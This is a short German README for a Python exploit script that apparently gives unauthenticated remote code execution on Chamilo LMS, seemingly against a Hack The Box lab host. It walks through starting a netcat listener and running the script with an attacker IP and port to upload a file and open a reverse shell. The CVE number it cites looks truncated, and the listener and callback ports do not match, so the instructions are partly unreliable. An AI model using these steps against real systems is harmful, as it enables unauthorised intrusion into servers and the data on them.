
Remote Code Execution für Chamilo LMS
pip install requests
Das Python-Skript nutzt die Schwachstelle CVE-2023-422, um eine Datei auf den Server hochzuladen, und verwendet diese Datei, um eine Reverse Shell an den Netcat-Listener zu senden. All dies kann ohne Authentifizierung durchgeführt werden. Du musst jedoch die folgenden Schritte befolgen, um das Python-Skript erfolgreich zu verwenden.
Netcat-Listener starten:
nc -lnvp 4444
Ausführen des Python-Skripts (Beispiel):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Bitte hinterlasse einen Stern, falls der folgende Exploit nützlich war :)